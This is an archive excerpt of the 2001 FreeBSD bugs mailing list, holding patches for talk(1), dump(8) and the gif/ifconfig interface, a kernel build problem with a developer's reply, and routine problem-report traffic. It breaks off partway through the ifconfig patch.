/usr/src/usr.bin/talk/init_disp.c *** talk/init_disp.c Mon Aug 30 10:21:17 1999 --- /usr/src/usr.bin/talk/init_disp.c Fri Jun 8 22:55:24 2001 *************** *** 90,111 **** signal(SIGINT, sig_sent); signal(SIGPIPE, sig_sent); /* curses takes care of ^Z */ ! my_win.x_nlines = LINES / 2; my_win.x_ncols = COLS; ! my_win.x_win = newwin(my_win.x_nlines, my_win.x_ncols, 0, 0); idlok(my_win.x_win, TRUE); scrollok(my_win.x_win, TRUE); wclear(my_win.x_win); ! his_win.x_nlines = LINES / 2 - 1; ! his_win.x_ncols = COLS; ! his_win.x_win = newwin(his_win.x_nlines, his_win.x_ncols, ! my_win.x_nlines+1, 0); ! idlok(my_win.x_win, TRUE); ! scrollok(his_win.x_win, TRUE); ! wclear(his_win.x_win); ! ! line_win = newwin(1, COLS, my_win.x_nlines, 0); #if defined(hline) || defined(whline) || defined(NCURSES_VERSION) whline(line_win, 0, COLS); #else --- 90,111 ---- signal(SIGINT, sig_sent); signal(SIGPIPE, sig_sent); /* curses takes care of ^Z */ ! his_win.x_nlines = LINES / 2; ! his_win.x_ncols = COLS; ! his_win.x_win = newwin(his_win.x_nlines, his_win.x_ncols, 0, 0); ! idlok(his_win.x_win, TRUE); ! scrollok(his_win.x_win, TRUE); ! wclear(his_win.x_win); ! ! my_win.x_nlines = LINES / 2 - 1; my_win.x_ncols = COLS; ! my_win.x_win = newwin(my_win.x_nlines, my_win.x_ncols, ! his_win.x_nlines + 1, 0); idlok(my_win.x_win, TRUE); scrollok(my_win.x_win, TRUE); wclear(my_win.x_win); ! line_win = newwin(1, COLS, his_win.x_nlines, 0); #if defined(hline) || defined(whline) || defined(NCURSES_VERSION) whline(line_win, 0, COLS); #else diff -c -r talk/invite.c /usr/src/usr.bin/talk/invite.c *** talk/invite.c Sat Feb 3 11:27:57 2001 --- /usr/src/usr.bin/talk/invite.c Fri Jun 8 22:12:23 2001 *************** *** 127,134 **** { message("Ringing your party again"); ! waddch(my_win.x_win, '\n'); ! if (current_line < my_win.x_nlines - 1) current_line++; /* force a re-announce */ msg.id_num = htonl(remote_id + 1); --- 127,134 ---- { message("Ringing your party again"); ! waddch(his_win.x_win, '\n'); ! if (current_line < his_win.x_nlines - 1) current_line++; /* force a re-announce */ msg.id_num = htonl(remote_id + 1); diff -c -r talk/io.c /usr/src/usr.bin/talk/io.c *** talk/io.c Fri Aug 18 12:24:17 2000 --- /usr/src/usr.bin/talk/io.c Fri Jun 8 22:14:35 2001 *************** *** 124,133 **** p_error(string) char *string; { ! wmove(my_win.x_win, current_line, 0); ! wprintw(my_win.x_win, "[%s : %s (%d)]\n", string, strerror(errno), errno); ! wrefresh(my_win.x_win); move(LINES-1, 0); refresh(); quit(); --- 124,133 ---- p_error(string) char *string; { ! wmove(his_win.x_win, current_line, 0); ! wprintw(his_win.x_win, "[%s : %s (%d)]\n", string, strerror(errno), errno); ! wrefresh(his_win.x_win); move(LINES-1, 0); refresh(); quit(); *************** *** 140,148 **** message(string) char *string; { ! wmove(my_win.x_win, current_line, 0); ! wprintw(my_win.x_win, "[%s]\n", string); ! if (current_line < my_win.x_nlines - 1) current_line++; ! wrefresh(my_win.x_win); } --- 140,148 ---- message(string) char *string; { ! wmove(his_win.x_win, current_line, 0); ! wprintw(his_win.x_win, "[%s]\n", string); ! if (current_line < his_win.x_nlines - 1) current_line++; ! wrefresh(his_win.x_win); } To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 14:12: 2 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from mtiwmhc25.worldnet.att.net (mtiwmhc25.worldnet.att.net [204.127.131.50]) by hub.freebsd.org (Postfix) with ESMTP id E1BB437B408 for ; Fri, 8 Jun 2001 14:11:52 -0700 (PDT) (envelope-from dnowlin@worldnet.att.net) Received: from worldnet.att.net ([12.81.77.6]) by mtiwmhc25.worldnet.att.net (InterMail vM.4.01.03.16 201-229-121-116-20010115) with ESMTP id <20010608211150.FSPE2291.mtiwmhc25.worldnet.att.net@worldnet.att.net> for ; Fri, 8 Jun 2001 21:11:50 +0000 Message-ID: <3B213F34.BA15172C@worldnet.att.net> Date: Fri, 08 Jun 2001 14:10:12 -0700 From: Dennis Nowlin X-Mailer: Mozilla 4.72C-CCK-MCD Caldera Systems OpenLinux [en] (X11; U; Linux 2.2.14 i686) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-bugs@FreeBSD.org Subject: Problem Report Content-Type: multipart/mixed; boundary="------------505B3FFADF4B09800C2AE98D" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. --------------505B3FFADF4B09800C2AE98D Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Team, I am having dificulty building a SMP kernel. I have attached two files, "NOWLIN" which is the kernel I'm trying to make, and "errors" which is the result of the "make" command. There appears to be a problem with the ethernet NIC and USB support. I am mystified by this because I commented out all references to USB and networking in the kernel text. Any help you can give will be appreciated. Thanks, Dennis --------------505B3FFADF4B09800C2AE98D Content-Type: text/plain; charset=us-ascii; name="NOWLIN" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="NOWLIN" # # NOWLIN -- My personal kernel configuration file for FreeBSD/i386 # # For more information on this file, please read the handbook section on # Kernel Configuration Files: # # http://www.FreeBSD.org/handbook/kernelconfig-config.html # # The handbook is also available locally in /usr/share/doc/handbook # if you've installed the doc distribution, otherwise always see the # FreeBSD World Wide Web server (http://www.FreeBSD.org/) for the # latest information. # # An exhaustive list of options and more detailed explanations of the # device lines is also present in the ./LINT configuration file. If you are # in doubt as to the purpose or necessity of a line, check first in LINT. # # $FreeBSD: src/sys/i386/conf/GENERIC,v 1.246.2.20 2000/10/31 23:16:07 n_hibma Exp $ machine i386 cpu I686_CPU ident NOWLIN maxusers 32 #makeoptions DEBUG=-g #Build kernel with gdb(1) debug symbols #options MATH_EMULATE #Support for x87 emulation #options INET #InterNETworking #options INET6 #IPv6 communications protocols options FFS #Berkeley Fast Filesystem options FFS_ROOT #FFS usable as root device [keep this!] #options SOFTUPDATES #Enable FFS soft updates support #options MFS #Memory Filesystem #options MD_ROOT #MD is a potential root device #options NFS #Network Filesystem #options NFS_ROOT #NFS usable as root device, NFS required #options MSDOSFS #MSDOS Filesystem options CD9660 #ISO 9660 Filesystem options CD9660_ROOT #CD-ROM usable as root, CD9660 required options PROCFS #Process filesystem options COMPAT_43 #Compatible with BSD 4.3 [KEEP THIS!] options SCSI_DELAY=15000 #Delay (in ms) before probing SCSI options UCONSOLE #Allow users to grab the console options USERCONFIG #boot -c editor options VISUAL_USERCONFIG #visual boot -c editor options KTRACE #ktrace(1) support options SYSVSHM #SYSV-style shared memory options SYSVMSG #SYSV-style message queues options SYSVSEM #SYSV-style semaphores options P1003_1B #Posix P1003_1B real-time extensions options _KPOSIX_PRIORITY_SCHEDULING options ICMP_BANDLIM #Rate limit bad replies options KBD_INSTALL_CDEV # install a CDEV entry in /dev # To make an SMP kernel, the next two are needed options SMP # Symmetric MultiProcessor Kernel options APIC_IO # Symmetric (APIC) I/O device isa #device eisa device pci # Floppy drives device fdc0 at isa? port IO_FD1 irq 6 drq 2 device fd0 at fdc0 drive 0 device fd1 at fdc0 drive 1 # ATA and ATAPI devices #device ata0 at isa? port IO_WD1 irq 14 #device ata1 at isa? port IO_WD2 irq 15 #device ata #device atadisk # ATA disk drives #device atapicd # ATAPI CDROM drives #device atapifd # ATAPI floppy drives #device atapist # ATAPI tape drives #options ATA_STATIC_ID #Static device numbering #options ATA_ENABLE_ATAPI_DMA #Enable DMA on ATAPI devices # SCSI Controllers #device ahb # EISA AHA1742 family device ahc # AHA2940 and onboard AIC7xxx devices #device amd # AMD 53C974 (Teckram DC-390(T)) #device isp # Qlogic family #device ncr # NCR/Symbios Logic #device sym # NCR/Symbios Logic (newer chipsets) #options SYM_SETUP_LP_PROBE_MAP=0x40 # Allow ncr to attach legacy NCR devices when # both sym and ncr are configured #device adv0 at isa? #device adw #device bt0 at isa? #device aha0 at isa? #device aic0 at isa? #device ncv # NCR 53C500 #device nsp # Workbit Ninja SCSI-3 #device stg # TMC 18C30/18C50 # SCSI peripherals device scbus # SCSI bus (required) device da # Direct Access (disks) device sa # Sequential Access (tape etc) device cd # CD device pass # Passthrough device (direct SCSI access) # RAID controllers interfaced to the SCSI subsystem #device asr # DPT SmartRAID V, VI and Adaptec SCSI RAID #device dpt # DPT Smartcache - See LINT for options! #device mly # Mylex AcceleRAID/eXtremeRAID # RAID controllers #device ida # Compaq Smart RAID #device amr # AMI MegaRAID #device mlx # Mylex DAC960 family #device twe # 3ware Escalade # atkbdc0 controls both the keyboard and the PS/2 mouse device atkbdc0 at isa? port IO_KBD device atkbd0 at atkbdc? irq 1 flags 0x1 device psm0 at atkbdc? irq 12 device vga0 at isa? # splash screen/screen saver pseudo-device splash # syscons is the default console driver, resembling an SCO console device sc0 at isa? flags 0x100 # Enable this and PCVT_FREEBSD for pcvt vt220 compatible console driver #device vt0 at isa? #options XSERVER # support for X server on a vt console #options FAT_CURSOR # start with block cursor # If you have a ThinkPAD, uncomment this along with the rest of the PCVT lines #options PCVT_SCANSET=2 # IBM keyboards are non-std # Floating point support - do not disable. device npx0 at nexus? port IO_NPX irq 13 # Power management support (see LINT for more options) device apm0 at nexus? disable flags 0x20 # Advanced Power Management # PCCARD (PCMCIA) support #device card #device pcic0 at isa? irq 0 port 0x3e0 iomem 0xd0000 #device pcic1 at isa? irq 0 port 0x3e2 iomem 0xd4000 disable # Serial (COM) ports device sio0 at isa? port IO_COM1 flags 0x10 irq 4 device sio1 at isa? port IO_COM2 irq 3 device sio2 at isa? disable port IO_COM3 irq 5 device sio3 at isa? disable port IO_COM4 irq 9 # Parallel port device ppc0 at isa? irq 7 device ppbus # Parallel port bus (required) device lpt # Printer #device plip # TCP/IP over parallel #device ppi # Parallel port interface device #device vpo # Requires scbus and da # PCI Ethernet NICs. #device de # DEC/Intel DC21x4x (``Tulip'') #device fxp # Intel EtherExpress PRO/100B (82557, 82558) #device tx # SMC 9432TX (83c170 ``EPIC'') #device vx # 3Com 3c590, 3c595 (``Vortex'') #device wx # Intel Gigabit Ethernet Card (``Wiseman'') # PCI Ethernet NICs that use the common MII bus controller code. # NOTE: Be sure to keep the 'device miibus' line in order to use these NICs! #device miibus # MII bus support #device dc # DEC/Intel 21143 and various workalikes #device pcn # AMD Am79C79x PCI 10/100 NICs #device rl # RealTek 8129/8139 #device sf # Adaptec AIC-6915 (``Starfire'') #device sis # Silicon Integrated Systems SiS 900/SiS 7016 #device ste # Sundance ST201 (D-Link DFE-550TX) #device tl # Texas Instruments ThunderLAN #device vr # VIA Rhine, Rhine II #device wb # Winbond W89C840F #device xl # 3Com 3c90x (``Boomerang'', ``Cyclone'') # ISA Ethernet NICs. #device ed0 at isa? port 0x280 irq 10 iomem 0xd8000 #device ex #device ep #device fe0 at isa? port 0x300 # WaveLAN/IEEE 802.11 wireless NICs. Note: the WaveLAN/IEEE really # exists only as a PCMCIA device, so there is no ISA attatement needed # and resources will always be dynamically assigned by the pccard code. #device wi # Aironet 4500/4800 802.11 wireless NICs. Note: the declaration below will # work for PCMCIA and PCI cards, as well as ISA cards set to ISA PnP # mode (the factory default). If you set the switches on your ISA # card for a manually chosen I/O address and IRQ, you must specify # those paremeters here. #device an # Xircom Ethernet #device xe # The probe order of these is presently determined by i386/isa/isa_compat.c. device ie0 at isa? port 0x300 irq 10 iomem 0xd0000 device le0 at isa? port 0x300 irq 5 iomem 0xd0000 device lnc0 at isa? port 0x280 irq 10 drq 0 device cs0 at isa? port 0x300 device sn0 at isa? port 0x300 irq 10 # Pseudo devices - the number indicates how many units to allocated. #pseudo-device loop # Network loopback #pseudo-device ether # Ethernet support #pseudo-device sl 1 # Kernel SLIP #pseudo-device ppp 1 # Kernel PPP #pseudo-device tun # Packet tunnel. #pseudo-device pty # Pseudo-ttys (telnet etc) #pseudo-device md # Memory "disks" #pseudo-device gif 4 # IPv6 and IPv4 tunneling #pseudo-device faith 1 # IPv6-to-IPv4 relaying (translation) # The `bpf' pseudo-device enables the Berkeley Packet Filter. # Be aware of the administrative consequences of enabling this! #pseudo-device bpf #Berkeley packet filter # USB support #device uhci # UHCI PCI->USB interface #device ohci # OHCI PCI->USB interface #device usb # USB Bus (required) #device ugen # Generic #device uhid # "Human Interface Devices" #device ukbd # Keyboard #device ulpt # Printer #device umass # Disks/Mass storage - Requires scbus and da #device ums # Mouse #device uscanner # Scanners # USB Ethernet, requires mii #device aue # ADMtek USB ethernet #device cue # CATC USB ethernet #device kue # Kawasaki LSI USB ethernet --------------505B3FFADF4B09800C2AE98D Content-Type: text/plain; charset=us-ascii; name="errors" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="errors" uipc_accf.o: In function `accept_filt_del': /usr/src/sys/compile/NOWLIN/../../kern/uipc_accf.c(.data+0x80): undefined reference to `sysctl__net_inet_children' usb_ethersubr.o: In function `usbintr': /usr/src/sys/compile/NOWLIN/../../dev/usb/usb_ethersubr.c(.text+0x31): undefined reference to `ether_input' --------------505B3FFADF4B09800C2AE98D-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 14:40: 9 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from odin.ac.hmc.edu (Odin.AC.HMC.Edu [134.173.32.75]) by hub.freebsd.org (Postfix) with ESMTP id BA5AF37B403 for ; Fri, 8 Jun 2001 14:40:06 -0700 (PDT) (envelope-from brdavis@odin.ac.hmc.edu) Received: (from brdavis@localhost) by odin.ac.hmc.edu (8.11.0/8.11.0) id f58Le4W23366; Fri, 8 Jun 2001 14:40:04 -0700 Date: Fri, 8 Jun 2001 14:40:04 -0700 From: Brooks Davis To: Dennis Nowlin Cc: freebsd-bugs@FreeBSD.ORG Subject: Re: Problem Report Message-ID: <20010608144004.A22476@Odin.AC.HMC.Edu> References: <3B213F34.BA15172C@worldnet.att.net> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="UlVJffcvxoiEqYs2" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3B213F34.BA15172C@worldnet.att.net>; from dnowlin@worldnet.att.net on Fri, Jun 08, 2001 at 02:10:12PM -0700 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --UlVJffcvxoiEqYs2 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Fri, Jun 08, 2001 at 02:10:12PM -0700, Dennis Nowlin wrote: > I am having dificulty building a SMP kernel. I have attached two files, > "NOWLIN" which is the kernel I'm trying to make, and "errors" which is > the result of the "make" command. >=20 > There appears to be a problem with the ethernet NIC and USB support. I > am mystified by this because I commented out all references to USB and > networking in the kernel text. I'm not sure why usb_ethersubr.c is being build, but why on earth are you trying to build a kernel without INET? IIRC this isn't supported. It's remotly possiable the problem is caused by the fact that you have at least five ethernet devices still included. It's also possiable you have a dirty build directory that config -r would fix. -- Brooks --=20 Any statement of the form "X is the one, true Y" is FALSE. PGP fingerprint 655D 519C 26A7 82E7 2529 9BF0 5D8E 8BE9 F238 1AD4 --UlVJffcvxoiEqYs2 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE7IUY0XY6L6fI4GtQRApKzAJwOjBvd0BWuhQztvwlMaXkJXZxmiwCdEHZI RfA33RCu3Pjo/ViQwzcR9uM= =URUL -----END PGP SIGNATURE----- --UlVJffcvxoiEqYs2-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 15:50:17 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3434D37B408 for ; Fri, 8 Jun 2001 15:50:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f58Mo1U64364; Fri, 8 Jun 2001 15:50:01 -0700 (PDT) (envelope-from gnats) Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B1D1037B40E for ; Fri, 8 Jun 2001 15:47:44 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: (from nobody@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f58Mlin64032; Fri, 8 Jun 2001 15:47:44 -0700 (PDT) (envelope-from nobody) Message-Id: <200106082247.f58Mlin64032@freefall.freebsd.org> Date: Fri, 8 Jun 2001 15:47:44 -0700 (PDT) From: tubbs@home.se To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: i386/27975: make buildworld fails when updating from 4.2-release to 4.3-stable. stops at ipmon. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 27975 >Category: i386 >Synopsis: make buildworld fails when updating from 4.2-release to 4.3-stable. stops at ipmon. >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri Jun 08 15:50:00 PDT 2001 >Closed-Date: >Last-Modified: >Originator: Markus >Release: 4.2 >Organization: >Environment: FreeBSD tubbs.2y.net 4.2-RELEASE FreeBSD 4.2-RELEASE #0: Mon Nov 20 13:02:55 GMT 2000 jkh@bento.FreeBSD.org:/usr/src/sys/compile/GENERIC i386 >Description: installed 4.2-release, cvsuped source to 4.3-stable and started make buildworld. make buildworld stops with following error: ===> sbin/ipmon cc -O -pipe -DIPL_NAME=\"/dev/ipl\" -I- -I/usr/src/sbin/ipmon/../../sys -I/usr/src/sbin/ipmon/../../contrib/ipfilter -I/usr/obj/usr/src/i386/usr/include -c /usr/src/sbin/ipmon/../../contrib/ipfilter/ipmon.c /usr/src/sbin/ipmon/../../contrib/ipfilter/ipmon.c:95: `TH_ECN' undeclared here (not in a function) /usr/src/sbin/ipmon/../../contrib/ipfilter/ipmon.c:95: initializer element is not constant /usr/src/sbin/ipmon/../../contrib/ipfilter/ipmon.c:95: (near initialization for `tcpfl[6].value') /usr/src/sbin/ipmon/../../contrib/ipfilter/ipmon.c: In function `print_natlog': /usr/src/sbin/ipmon/../../contrib/ipfilter/ipmon.c:408: `NL_FLUSH' undeclared (first use in this function) /usr/src/sbin/ipmon/../../contrib/ipfilter/ipmon.c:408: (Each undeclared identifier is reported only once /usr/src/sbin/ipmon/../../contrib/ipfilter/ipmon.c:408: for each function it appears in.) *** Error code 1 Stop in /usr/src/sbin/ipmon. *** Error code 1 Stop in /usr/src/sbin. *** Error code 1 Stop in /usr/src. *** Error code 1 Stop in /usr/src. *** Error code 1 Stop in /usr/src. su-2.04# I´ve tried to cvsup from 5 different servers with same results. Ive tried this on two different boxes. >How-To-Repeat: see above >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 16:14:24 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3C87A37B405; Fri, 8 Jun 2001 16:14:21 -0700 (PDT) (envelope-from dd@FreeBSD.org) Received: (from dd@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f58NELe68814; Fri, 8 Jun 2001 16:14:21 -0700 (PDT) (envelope-from dd) Date: Fri, 8 Jun 2001 16:14:21 -0700 (PDT) From: Message-Id: <200106082314.f58NELe68814@freefall.freebsd.org> To: ancient@bofh.cet.net, dd@FreeBSD.org, freebsd-bugs@FreeBSD.org, dd@FreeBSD.org Subject: Re: kern/26787: sysctl change request Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: sysctl change request State-Changed-From-To: analyzed->open State-Changed-By: dd State-Changed-When: Fri Jun 8 16:13:54 PDT 2001 State-Changed-Why: Responsible-Changed-From-To: freebsd-bugs->dd Responsible-Changed-By: dd Responsible-Changed-When: Fri Jun 8 16:13:54 PDT 2001 Responsible-Changed-Why: I'm working on this. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=26787 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 19:20: 8 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7C5D237B405 for ; Fri, 8 Jun 2001 19:20:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f592K1w89495; Fri, 8 Jun 2001 19:20:01 -0700 (PDT) (envelope-from gnats) Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 39E9437B405 for ; Fri, 8 Jun 2001 19:13:25 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: (from nobody@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f592DP289167; Fri, 8 Jun 2001 19:13:25 -0700 (PDT) (envelope-from nobody) Message-Id: <200106090213.f592DP289167@freefall.freebsd.org> Date: Fri, 8 Jun 2001 19:13:25 -0700 (PDT) From: sgreear@vsni.com To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: bin/27982: dump(8) doesn't seem to correctly grok the -T option. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 27982 >Category: bin >Synopsis: dump(8) doesn't seem to correctly grok the -T option. >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri Jun 08 19:20:01 PDT 2001 >Closed-Date: >Last-Modified: >Originator: Samuel Greear >Release: 4.3-STABLE >Organization: Virtual Space Network, Inc. >Environment: FreeBSD 4.3-STABLE #0: Thu Jun 7 05:30:36 MST 2001 sgreear@host1.isp-admin.com:/usr/src/sys/compile/VSNI >Description: Executing: dump -f - -T "Sat Jun 9 18:05:38 2001" /archive/temp Reports: Must specify disk or filesystem whereas Executing: dump -f - -T "Sat Jun 9 18:05:38 2001" . /archive/temp results in the desired activity. Note the "." after the date string. dump appears to do argc--; argv++; one too many times when the -T option is specified. >How-To-Repeat: >Fix: --- oldmain.c Sat Jun 9 19:04:44 2001 +++ main.c Sat Jun 9 19:04:58 2001 @@ -191,8 +191,6 @@ } Tflag = 1; lastlevel = '?'; - argc--; - argv++; break; case 'u': /* update /etc/dumpdates */ >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 19:20:49 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id CD79137B406 for ; Fri, 8 Jun 2001 19:20:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f592K1S89504; Fri, 8 Jun 2001 19:20:01 -0700 (PDT) (envelope-from gnats) Received: from minya.sea.one-eyed-alien.net (minya.sea.one-eyed-alien.net [216.39.168.226]) by hub.freebsd.org (Postfix) with ESMTP id 8E6A037B401 for ; Fri, 8 Jun 2001 19:18:37 -0700 (PDT) (envelope-from brooks@minya.sea.one-eyed-alien.net) Received: by minya.sea.one-eyed-alien.net (Postfix, from userid 1001) id DE1CE24D1F; Fri, 8 Jun 2001 19:20:51 -0700 (PDT) Message-Id: <20010609022051.DE1CE24D1F@minya.sea.one-eyed-alien.net> Date: Fri, 8 Jun 2001 19:20:51 -0700 (PDT) From: Brooks Davis Reply-To: Brooks Davis To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.113 Subject: kern/27983: [PATCH] make gif fully dynamic Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 27983 >Category: kern >Synopsis: [PATCH] make gif fully dynamic >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Jun 08 19:20:01 PDT 2001 >Closed-Date: >Last-Modified: >Originator: Brooks Davis >Release: FreeBSD 5.0-CURRENT i386 >Organization: The Aerospace Corporation >Environment: System: FreeBSD minya.sea.one-eyed-alien.net 5.0-CURRENT FreeBSD 5.0-CURRENT #41: Fri Jun 8 18:53:08 PDT 2001 root@minya.sea.one-eyed-alien.net:/usr/src/sys/compile/MINYA i386 >Description: Make the gif(4) interface both loadable and demand allocatable. Add generic ifconfig support to enable similar changes to other pseudo devices such as lp, faith, ppp, and stf. >How-To-Repeat: >Fix: in /usr/src do "mkdir sys/modules/if_gif" and apply the following patch: Index: sbin/ifconfig/ifconfig.8 =================================================================== RCS file: /home/ncvs/src/sbin/ifconfig/ifconfig.8,v retrieving revision 1.41 diff -u -u -r1.41 ifconfig.8 --- sbin/ifconfig/ifconfig.8 2001/06/02 04:09:53 1.41 +++ sbin/ifconfig/ifconfig.8 2001/06/09 01:14:31 @@ -50,6 +50,9 @@ .Oc .Op Ar parameters .Nm +.Fl D +.Ar interface +.Nm .Fl a .Op Fl L .Op Fl d @@ -142,6 +145,16 @@ .Dq name unit , for example, .Dq en0 . +Generally this device must exist, but some pseudo interfaces support +creation of demand. +For those devices, an arbitrary unit number may be specified and the +interface will be created so long as another parameter is specified. +Additionally, a wildcard name of the form +.Dq driver# , +for example, +.Dq gif# , +may be specified which will cause a new interface to be created. +In this case the new interface name will be printed to stdout. .El .Pp The following parameters may be set with @@ -537,12 +550,18 @@ .Nm will report only the details specific to that protocol family. .Pp -If the driver does supports the media selection system, the supported -media list will be included in the output. +If the +.Fl D +flag is passed before an interface name +.Nm +will attempt to delete +the interface via its control device. .Pp If the .Fl m -flag is passed before an interface name, ifconfig will display all +flag is passed before an interface name, +.Nm +will display all of the supported media for the specified interface. If .Fl L Index: sbin/ifconfig/ifconfig.c =================================================================== RCS file: /home/ncvs/src/sbin/ifconfig/ifconfig.c,v retrieving revision 1.62 diff -u -u -r1.62 ifconfig.c --- sbin/ifconfig/ifconfig.c 2001/05/29 09:13:44 1.62 +++ sbin/ifconfig/ifconfig.c 2001/06/09 01:25:27 @@ -104,6 +104,10 @@ #define NI_WITHSCOPEID 0 #endif +#ifndef WILDCARDUNIT +#define WILDCARDUNIT '#' +#endif + struct ifreq ifr, ridreq; struct ifaliasreq addreq; #ifdef INET6 @@ -128,6 +132,7 @@ int doalias; int clearaddr; int newaddr = 1; +int deleteif; #ifdef INET6 static int ip6lifetime; #endif @@ -150,7 +155,13 @@ struct sockaddr_dl *sdl, struct if_msghdr *ifm, struct ifa_msghdr *ifam)); void usage __P((void)); -void ifmaybeload __P((char *name)); +void name2typeunit __P((const char *name, char *type, size_t tlen, + int *unit)); +void typeunit2name __P((char *name, size_t nlen, const char *type, + int unit)); +void ifmaybeload __P((const char *name)); +int ifmaybecreate __P((char *name, size_t len, int trystatic)); +void ifdelete __P((const char *name)); #ifdef INET6 int prefix __P((void *, int)); @@ -350,16 +361,18 @@ usage() { #ifndef INET6 - fprintf(stderr, "%s\n%s\n%s\n%s\n%s\n", + fprintf(stderr, "%s\n%s\n%s\n%s\n%s\n%s\n", "usage: ifconfig interface address_family [address [dest_address]]", " [parameters]", + " ifconfig -D interface", " ifconfig -a [-d] [-m] [-u] [address_family]", " ifconfig -l [-d] [-u] [address_family]", " ifconfig [-d] [-m] [-u]"); #else - fprintf(stderr, "%s\n%s\n%s\n%s\n%s\n", + fprintf(stderr, "%s\n%s\n%s\n%s\n%s\n%s\n", "usage: ifconfig [-L] interface address_family [address [dest_address]]", " [parameters]", + " ifconfig -D interface", " ifconfig -a [-L] [-d] [-m] [-u] [address_family]", " ifconfig -l [-d] [-u] [address_family]", " ifconfig [-L] [-d] [-m] [-u]"); @@ -388,7 +401,7 @@ /* Parse leading line options */ all = downonly = uponly = namesonly = 0; - while ((c = getopt(argc, argv, "adlmu" + while ((c = getopt(argc, argv, "adDlmu" #ifdef INET6 "L" #endif @@ -411,6 +424,9 @@ case 'u': /* restrict scan to "up" interfaces */ uponly++; break; + case 'D': /* delete the specified interface */ + deleteif++; + break; case 'm': /* show media choices in status */ supmedia = 1; break; @@ -430,10 +446,19 @@ if (uponly && downonly) usage(); + /* -D make no sense with any other flags or other then one argument */ + if 